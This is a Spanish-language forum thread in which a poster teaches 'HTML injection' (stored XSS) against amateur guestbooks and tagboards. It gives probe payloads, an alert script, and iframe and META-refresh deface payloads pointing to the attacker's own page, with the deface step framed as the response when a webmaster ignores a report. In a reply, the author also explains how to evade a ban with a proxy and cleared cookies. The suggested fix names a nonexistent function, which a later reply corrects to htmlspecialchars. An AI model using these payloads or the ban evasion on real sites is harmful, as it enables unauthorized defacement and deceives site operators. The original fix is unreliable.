Html inyection

[programatrix]

1 ¿Que es el html inyection?
Se trata de una técnica que como su propio nombre indica inyecta código dentro de una web en html...
Al inyectar código html maligno podemos hacer que el navegador se nos vuelva (loco) y muestre la web que quiera el autor del deface.
2 Y esto ¿por qué sucede?
Esto sucede porque los creadores de la web no filtraron bien las etiquetas html permitiendolo. Esto se de mucho en los libros de visitas hechos por aficionados o en tagboard hechos por aficionados a la programación. Al subir nosotros un texto a la base de datos dicho texto queda públicado en internet y como el navegador lo muestra tali lo que recibe pues si ese texto es una orden al navegador de que deje esa web mostrando otra web pues lo hace.
3 Practica
Para comprobar si el libro de visitas o lo que sea es vulnerable pues se hace lo siguiente, pones en el libro de visitas el siguiente código:

<h1>Prueba

Si aparece en negrita y grande borra y pureba también lo siguiente:

<script>alert('Es vulnerable')</script>

Si estas dos cosas suceden ves corriendo a notificar al webmaster de que su libro es vulnerable esto es importante IMPORTANTE NOTIFICALE
Si no te ha hecho ni caso..., pues entonces vamos al siguiente paso:

<iframe
src=http://www.webdetudeface.net></iframe>

O bien:

<META HTTP-EQUIV="refresh" CONTENT="1; url=http://www.webdetudeface.net">

La dirección webdetuceface tiene que ser donde tienes la web que vas a mostrar IMPORTANTE pon tu email diciendo al webmaster donde contactar para que pueda arreglar lo que has lidado
4 Ética de estos ataques
Pues estos ataques no es que sean muy éticos, pueden servir para divertirse y aprender pero no para más..., lo bueno que tiene esto es que el daño en la web es mínimo y un webmaster espabilaó lo arreglaría enseguida.
5 ¿Y como se solucionan?
Pues muy sencillo, en el archivo php tienes que filtrar lo que te entra con htmlspecialvars, así el ataque no se lleva a cabo.
6 ¿Porqué este manual?
Por dos cosas, porque no lo he visto en el foro. Y la segunda porque he visto manuales de mysql inyection, XSS y remote file inyection pero ninguno de html inyectión y me parece interesante.
Saludos  8)

[askatasun]

interesantee, lo que pasa es que si no te funciona y ven en el libro de visitas <script>alert</script>  te echaran un ban de por vida

[programatrix]

Usa proxy y limpia la cookie.., no es para tanto yo me quité en 5 minutos un ban de smf 

[comapalta]

Jajajaja bueno 

[Colymore]

Solo una aclaracion.
Creo que esto esta mal:
Por dos cosas, porque no lo he visto en el foro. Y la segunda porque he visto manuales de mysql inyection, XSS y remote file inyection pero ninguno de html inyectión y me parece interesante.

Remote File INYECTION??Creo que es remote file inclusion remote command execution..pero inyection no me suena.
Saludos

[-Riven-Ward-]

Mmm...... Primero que nada es "injection", no "inyection". Segundo, esto se llama "XSS", Cross Site Scripting, no HTML Injection.

Tercero...

Código [Seleccionar] Expandir

en el archivo php tienes que filtrar lo que te entra con htmlspecialvars

La función es htmlspecialchars()... Y también se puede usar htmlentities().

Y cuarto...

Si no te ha hecho ni caso..., pues entonces vamos al siguiente paso:

¿Cómo es eso de que si no te ha hecho ni caso? :shocked:. Siesque no te hizo caso, pues le jodes hasta que te oiga, le haces muchos sumbidos y le mandas muchos mails xDDD, pero no le juankeas la web :shocked:.

Y bueno, lo que dijo Colymore sobre el RFI.

Salu2!

[programatrix]

Ok, ok, gracias riven ward por completarme el tutorial 
Pues es que estó en una web donde aprendí lo llamabán html inyection.
Saludos 

[Superplay]

¿Cómo se borra la Cookie o como sea?jejejejejeje

Aconsejame un buen xploit 

[lupu]

superplay, para no saber que es una cookie no se que haces leyendo esto, has probao a buscar¿